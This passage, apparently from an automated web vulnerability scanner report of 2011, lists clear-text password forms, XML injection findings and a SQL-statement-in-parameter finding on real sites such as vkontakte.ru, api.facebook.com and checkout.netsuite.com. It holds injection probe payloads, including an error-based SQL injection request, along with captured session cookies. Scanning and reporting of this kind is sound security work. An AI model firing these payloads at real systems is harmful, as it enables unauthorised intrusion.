<td style=\'width:50%;\'><form onsubmit="f_reg(this); return false;" >';
       str+='...................... ................... ...... ......................, ...... ........ ................ .......... .................. .. ................ .......................';        
       s
...[SNIP]...
<br><input size=20 name="pass" type="password" value="" onClick=\'this.focus();\'>';
       str+='<br>
...[SNIP]...
<br><input size=20 name="pass2" type="password" value="" onClick=\'this.focus();\'>';
       str+= '<br>
...[SNIP]...
9.7. http://odnoklassniki.ru/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://odnoklassniki.ru
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: odnoklassniki.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: CHECK_COOKIE=true; Domain=.odnoklassniki.ru; Expires=Mon, 25-Apr-2011 14:27:36 GMT; Path=/
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Rendered-Blocks: HtmlPage
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 14:26:36 GMT
Content-Length: 13753

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>..........................</title>
<meta http-equiv="Content-Type" con
...[SNIP]...
<div class="panelBox_body"><form action="http://www.odnoklassniki.ru/dk?cmd=AnonymLogin&amp;st.cmd=anonymLogin&amp;tkn=6956" method="post"><input value="" type="hidden" name="st.redirect">
...[SNIP]...
</label><input id="field_password" maxlength="" name="st.password" value="" class="fi" type="password" size="20"><div class="checkbox">
...[SNIP]...
9.8. http://pda.loveplanet.ru/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pda.loveplanet.ru
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: pda.loveplanet.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:51:44 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: domhit=1; path=/; expires=Mon, 02-May-2011 14:51:44 GMT; domain=.pda.loveplanet.ru
Set-Cookie: affiliate_reff=http%3A%2F%2Fmy.webalta.ru%2F; path=/; expires=Tue, 24-Apr-2012 14:51:44 GMT; domain=.pda.loveplanet.ru
Set-Cookie: randomhit=1698142961; path=/; expires=Tue, 24-Apr-2012 14:51:44 GMT; domain=.pda.loveplanet.ru
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 25 Apr 2011 14:51:44 GMT
Content-Length: 11125

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<title>.................... LovePlanet.ru. .......... .............. .. .........
...[SNIP]...
<div class="bl_login bg_lightgray">
       <form method="post" action="/a-logon/" name="login">
           <input type="hidden" name="a" value="logon">
...[SNIP]...
<nobr>............&nbsp;<input type="password" class="itxt" size="5" name="password" id="password"></nobr>
...[SNIP]...
9.9. http://pretty.ru/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pretty.ru
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: pretty.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:24:33 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: domhit=1; path=/; expires=Mon, 02-May-2011 14:24:33 GMT; domain=.pretty.ru
Set-Cookie: affiliate_reff=; path=/; expires=Thu, 01-Jan-1972 03:00:00 GMT; domain=.pretty.ru
Set-Cookie: randomhit=1511529011; path=/; expires=Tue, 24-Apr-2012 14:24:33 GMT; domain=.pretty.ru
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 25 Apr 2011 14:24:33 GMT
Content-Length: 59765

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8
...[SNIP]...
<td>
        <form method="post" action="/a-logon/" name="login">
<input type="hidden" name="a" value="logon">
...[SNIP]...
<input type="text" name="auid" id="auid" size="10">
            ............ <input type="password" size="10" name="password" id="password">
            <input type="submit" value=".........." class="button">
...[SNIP]...
9.10. http://support.trust-guard.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://support.trust-guard.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: support.trust-guard.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SWIFT_sessionid40=nnfa18si4n87mc68kwytxeynpprc2i1o; SWIFT_client=a%3A1%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=79aen2tq7o9d45p59q0nb8srhrs5qbvg; __utma=147269874.1166530582.1303748966.1303748966.1303758698.2; __utmc=147269874; __utmb=147269874.3.10.1303758698; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:12:04 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 14128


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<td bgcolor="#F5F5F5" colspan="4"><form name="loginform" action="http://support.trust-guard.com/index.php" method="POST"><table width="100%" border="0" cellspacing="1" cellpadding="2">
...[SNIP]...
<td><input type="password" name="loginpassword" value="" class="loginpassword"></td>
...[SNIP]...
9.11. http://support.trust-guard.com/index.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://support.trust-guard.com
Path:   /index.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /index.php?_m=troubleshooter&_a=view HTTP/1.1
Host: support.trust-guard.com
Proxy-Connection: keep-alive
Referer: http://support.trust-guard.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SWIFT_sessionid40=nnfa18si4n87mc68kwytxeynpprc2i1o; SWIFT_sessionid80=79aen2tq7o9d45p59q0nb8srhrs5qbvg; __utma=147269874.1166530582.1303748966.1303748966.1303758698.2; __utmc=147269874; __utmb=147269874.3.10.1303758698; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_client=a%3A1%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:12:49 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 12475


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-e
...[SNIP]...
<td bgcolor="#F5F5F5" colspan="4"><form name="loginform" action="http://support.trust-guard.com/index.php" method="POST"><table width="100%" border="0" cellspacing="1" cellpadding="2">
...[SNIP]...
<td><input type="password" name="loginpassword" value="" class="loginpassword"></td>
...[SNIP]...
9.12. http://vkontakte.ru/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vkontakte.ru
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: vkontakte.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Mon, 25 Apr 2011 14:23:04 GMT
Content-Type: text/html; charset=windows-1251
Connection: keep-alive
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: remixchk=5; expires=Tue, 17-Apr-2012 02:49:46 GMT; path=/; domain=.vkontakte.ru
Pragma: no-cache
Cache-control: no-store
Vary: Accept-Encoding
Content-Length: 12904

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<script type="
...[SNIP]...
<div id="quick_login">
<form method="POST" name="login" id="quick_login_form" action="http://login.vk.com/?act=login" onsubmit="if (vklogin) {return true} else {quick_login();return false;}">
<input type="hidden" name="act" value="login" />
...[SNIP]...
<div class="labeled"><input type="password" name="pass" class="text" onfocus="show('quick_expire')" id="quick_pass" /></div>
...[SNIP]...
9.13. http://www.integritydefender.com/account.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.integritydefender.com
Path:   /account.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /account.php HTTP/1.1
Host: www.integritydefender.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=da4c413fd2f41e463cb4aac35dcd5799

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:45:58 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 13118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<td valign="top" style="border-right:1px dotted #cccccc;">
               
           <form action="action/user-account-action.php" method="post" name="userAccountLogin" id="userAccountLogin" onsubmit="return validateLogin();" >
<div style="width:370px; padding-left:100px; padding-bottom:10px;">
...[SNIP]...
<td width="214" align="left" valign="middle"><input name="userPassword" type="password" id="userPassword" class="signin-textbox" /></td>
...[SNIP]...
9.14. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.marketgid.com
Path:   /pnews/773204/i/7269/pp/2/1/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /pnews/773204/i/7269/pp/2/1/ HTTP/1.1
Host: www.marketgid.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MGformStatus=2; __utma=250877338.2141066310.1303423654.1303423654.1303423654.1; __utmz=250877338.1303423654.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/14|utmcmd=referral; __gads=ID=909f464f6199feed:T=1303423666:S=ALNI_MY6fIaxdoRzO_fDyTrK1Li9f5G69A; __qca=P0-972785183-1303423664935

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:31:32 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=20
Cache-Control: no-cache, must-revalidate
Content-Length: 48728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div class="menu_body" style="margin-bottom:5px">
<form id="mg-auth-form-1" action="http://usr.marketgid.com/creative/auth/" method="post">
<div>
...[SNIP]...
</div>
<input id="pass" type="password" name="pass" value=".........." size="25" tabindex="2" onfocus="form_change(this)" onblur="form_change(this)" /><input class="submit-button" type="submit" value="........" tabindex="3" />
...[SNIP]...
9.15. http://www.ripoffreport.com/LoginPage.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ripoffreport.com
Path:   /LoginPage.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /LoginPage.aspx HTTP/1.1
Host: www.ripoffreport.com
Proxy-Connection: keep-alive
Referer: http://www.ripoffreport.com/ConsumerResources.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=38277280.1303747675.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=38277280.797691246.1303747675.1303747675.1303747675.1; __utmc=38277280; __utmb=38277280.2.10.1303747675

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 16:25:18 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXAUTH=204DAD60EB1BBD88C59E5F5F9173063C696A0F7001F3DAB68B91E49725FD98FA9004A1B768AD6C5CCF6FC284A723C82A4AE351B51D920A7472D17715227F8C8F5EA7067B1EC089AE4B0F0AD2D9D779F79D62DB169E8EB4A2EDB1833E9FBFB093E1F7AA47EC45274B2DB2BA709F7D2D261236D9197EEE8A4CF97B216F06C285E994CAAB0AF14BE9CF81CF25F5779A8377F57F2E3A93FF28013B612CC450AC879DDF0FFF87E5F1BFA2EA945555182C4ADA; expires=Wed, 25-May-2011 16:13:07 GMT; path=/; HttpOnly
P3P: CP="NON DSP COR ADM DEV HIS OTPi OUR IND STA"
ROR-NODE: 09
Content-Length: 18684


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="/LoginPage.aspx" id="aspnetForm">
<div>
...[SNIP]...
<td><input name="ctl00$ctl00$cphBodyTemplate$cphLeftMasterReport$Login1$PasswordTextbox" type="password" id="ctl00_ctl00_cphBodyTemplate_cphLeftMasterReport_Login1_PasswordTextbox" size="40" /></td>
...[SNIP]...
10. XML injection  previous  next
There are 6 instances of this issue:

10.1. http://api.facebook.com/restserver.php [format parameter]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The format parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the format parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.eset.com%2Fus%2Fhome%2Fsmart-security%22%5D&format=json]]>>&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home/smart-security
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Mon, 25 Apr 2011 08:22:36 -0700
Pragma:
X-FB-Rev: 370179
X-FB-Server: 10.32.44.124
X-Cnection: close
Date: Mon, 25 Apr 2011 15:20:36 GMT
Content-Length: 773

fb_sharepro_render('<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<links_getStats_response xmlns=\"http://api.facebook.com/1.0/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://api.facebook.com/1.0/ http://api.facebook.com/1.0/facebook.xsd\" list=\"true\">
...[SNIP]...
10.2. http://api.flickr.com/services/feeds/photos_public.gne [format parameter]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://api.flickr.com
Path:   /services/feeds/photos_public.gne

Issue detail

The format parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the format parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /services/feeds/photos_public.gne?id=35898586@N08&lang=en-us&format=json]]>>&jsoncallback=jsonp1303758888918 HTTP/1.1
Host: api.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.kayako.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=9ofvlfh6qmjsk&b=3&s=5t; fldetectedlang=en-us; localization=en-us%3Bus%3Bus

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:42:06 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 09 Mar 2011 01:14:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, private
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
X-Served-By: www25.flickr.mud.yahoo.com
Connection: close
Content-Type: application/atom+xml; charset=utf-8
Content-Length: 32163

<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<feed xmlns="http://www.w3.org/2005/Atom"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:flickr="urn:flickr:"
xmlns:media="
...[SNIP]...
10.3. http://l-files.livejournal.net/userapps/4/image [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://l-files.livejournal.net
Path:   /userapps/4/image

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /userapps]]>>/4/image?v=1297757136 HTTP/1.1
Host: l-files.livejournal.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Mon, 25 Apr 2011 15:05:37 GMT
Content-Type: text/html; charset=utf-8
Retry-After: 0
X-Varnish: 1987947190
Age: 0
Via: 1.1 varnish
Content-Length: 368
Connection: keep-alive


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>200 OK</title>
</hea
...[SNIP]...
10.4. http://l-files.livejournal.net/userapps/4/image [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://l-files.livejournal.net
Path:   /userapps/4/image

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /userapps/4]]>>/image?v=1297757136 HTTP/1.1
Host: l-files.livejournal.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Mon, 25 Apr 2011 15:05:50 GMT
Content-Type: text/html; charset=utf-8
Retry-After: 0
X-Varnish: 1698422522
Age: 0
Via: 1.1 varnish
Content-Length: 368
Connection: keep-alive


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>200 OK</title>
</hea
...[SNIP]...
10.5. http://l-files.livejournal.net/userapps/4/image [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://l-files.livejournal.net
Path:   /userapps/4/image

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /userapps/4/image]]>>?v=1297757136 HTTP/1.1
Host: l-files.livejournal.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Mon, 25 Apr 2011 15:06:06 GMT
Content-Type: text/html; charset=utf-8
Retry-After: 0
X-Varnish: 610014231
Age: 0
Via: 1.1 varnish
Content-Length: 367
Connection: keep-alive


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>200 OK</title>
</hea
...[SNIP]...
10.6. http://www.netdiligence.com/xml_content/stories.xml [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.netdiligence.com
Path:   /xml_content/stories.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /xml_content]]>>/stories.xml HTTP/1.1
Host: www.netdiligence.com
Proxy-Connection: keep-alive
Referer: http://www.netdiligence.com/slickboard.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116969625.1303748949.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=116969625.1813302970.1303748949.1303748949.1303748949.1; __utmc=116969625; __utmb=116969625.1.10.1303748949

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 16:29:02 GMT
Server: Apache
Content-Length: 301
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /xml_content]]&gt;&gt;/stories.xml was not found on this server.</p>
...[SNIP]...
11. SQL statement in request parameter  previous  next
There are 11 instances of this issue:

11.1. https://checkout.netsuite.com/core/media/media.nl  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://checkout.netsuite.com
Path:   /core/media/media.nl

Request

GET /core/media/media.nl?id=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&c=NLCORP&h=65bae699770c58b12c10 HTTP/1.1
Referer: https://checkout.netsuite.com/pages/portal/page_not_found.jsp?internal=F
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
